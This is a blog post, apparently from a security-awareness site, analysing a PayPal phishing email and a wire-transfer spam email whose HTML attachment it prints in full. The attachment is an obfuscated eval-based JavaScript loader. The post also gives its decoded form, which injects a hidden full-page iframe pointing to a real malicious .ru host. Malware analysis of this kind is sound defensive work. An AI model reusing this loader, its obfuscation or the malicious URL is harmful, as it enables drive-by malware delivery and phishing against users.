You might have heard about the spamming on social media channels like facebook spam, LinkedIn spam and so on, the danger situation is the spam email that has an ability to steal the financial information of the victim, look at this scam below
I have just received an email, a paypal spam email. We can easily say that this is not a legitimate email because it starts with “Dear Pay Pal user” but paypal always writes the name of the customer. You can see that the spammers has just put the hyper link on some text, the links are not the paypal links but the spammer website links, the target website might have some malware or a phishing page of paypal or it simply redirect you to another website.
The second email from the spammer is wire transfer email, look at the picture:
The spammers has attached a HTML file and said that this is the Internet explorer file, means they want receiver to open it on Internet explorer, since IE more vulnerable then other browsers so the more chance of success.
Lets analyze it:
This is the HTML file that contain the code:
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>page15</title> </head> <body><style> body { margin: 0;} #iframe_box {position: absolute; overflow: auto; margin: 0; width: 100%; height: 100%;} </style> <script>c=3-1;i=-2+c;if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean().prototype.q}catch(egewgsd){if(window.document)f=['-30i78i57i74i-8i58i71i80i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i65i62i74i57i69i61i-1i1i19i-8i-30i58i71i80i6i65i60i-8i21i-8i-1i65i62i74i57i69i61i55i58i71i80i-1i19i-8i-30i58i71i80i6i75i74i59i-8i21i-8i-1i64i76i76i72i18i7i7i79i65i75i67i71i70i75i65i70i76i72i57i74i57i6i74i77i18i16i8i16i8i7i65i69i63i7i23i72i74i71i69i71i21i70i57i59i64i57i-1i19i-8i-30i60i71i59i77i69i61i70i76i6i58i71i60i81i6i75i76i81i68i61i6i71i78i61i74i62i68i71i79i-8i21i-8i-1i64i65i60i60i61i70i-1i19i-8i-30i60i71i59i77i69i61i70i76i6i58i71i60i81i6i57i72i72i61i70i60i27i64i65i68i60i0i58i71i80i1i19'][0].split('i');v="ev"+"a"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;204!=i;i+=1){j=i;s=s+r["f"+"r"+"omC"+"har"+"Code"](w[j]*1+40);} if(v)z=s;e(z);</script></body> </html>
It seems to be the Java code and I have decrypted it:
//eval var box = document.createElement('iframe'); box.id = 'iframe_box'; box.src = 'http://wiskonsintpara.ru:8080/img/?promo=nacha'; document.body.style.overflow = 'hidden'; document.body.appendChild(box); //jsunpack.called CreateElement iframe //jsunpack.url http://wiskonsintpara.ru:8080/img/?promo=nacha //jsunpack.url var s = var box = document.createElement('iframe'); box.id = 'iframe_box'; box.src = 'http://wiskonsintpara.ru:8080/img/?promo=nacha'; document.body.style.overflow = 'hidden'; document.body.appendChild(box); //jsunpack.url var z = var box = document.createElement('iframe'); box.id = 'iframe_box'; box.src = 'http://wiskonsintpara.ru:8080/img/?promo=nacha'; document.body.style.overflow = 'hidden'; document.body.appendChild(box); //jsunpack.url var newurl = var box = document.createElement('iframe'); box.id = 'iframe_box'; box.src = 'http://wiskonsintpara.ru:8080/img/?promo=nacha'; document.body.style.overflow = 'hidden'; document.body.appendChild(box);
It is some sort of the iframe injection attack and the final destination or URL is
//jsunpack.called CreateElement iframe //jsunpack.url http://wiskonsintpara.ru:8080/img/?promo=nacha
It is not a bank website but a URL of the malicious website.
So the conclusion is very simple never trust on any malicious email because such a emails are nothing but a way to steal your money, educate the people around you because the security awareness is only the possible way of online security.
- See more at: http://www.ehacking.net/2012/04/paypal-wire-transfer-scam-email-scam.html#sthash.Bn0Z3HXr.dpuf